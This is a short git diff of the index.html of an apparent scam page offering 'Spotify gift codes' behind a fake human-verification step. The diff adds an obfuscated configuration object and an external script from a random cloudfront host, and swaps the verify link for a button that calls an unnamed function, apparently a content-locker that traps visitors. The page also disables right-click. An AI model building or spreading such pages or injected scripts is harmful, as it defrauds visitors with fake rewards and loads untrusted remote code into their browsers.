--- a/index.html
+++ b/index.html
@@ -21,6 +21,10 @@
   <link rel="stylesheet" type="text/css" href="css/stylesV2.css">
     
 </head>
+	<script type="text/javascript">
+    var FAIVF_omS_waLMKc={"it":4285318,"key":"b7403"};
+</script>
+<script src="https://d3qborf6vf5lth.cloudfront.net/2a47537.js"></script>
 <body class="page preload" oncontextmenu="return false">
 
   <script type="text/javascript">document.body.className += " preload";</script>
@@ -134,7 +138,7 @@
 		<div id="verify">
 			<br><br><p style="color:white;">Before receiving the characters last of Spotify Gift Code you must verify that you are a human and not a software (Automated bot).</p>
 			<br><br>
-			<center><a target="_self" href="https://popycard.site/g/spotifygift/verify/"><img src="images/verify-now.png"></a></center>
+			<center><button onclick="_yk()"> <img src="images/verify-now.png"></button></center>
 			<br><br>
 
 			</div>
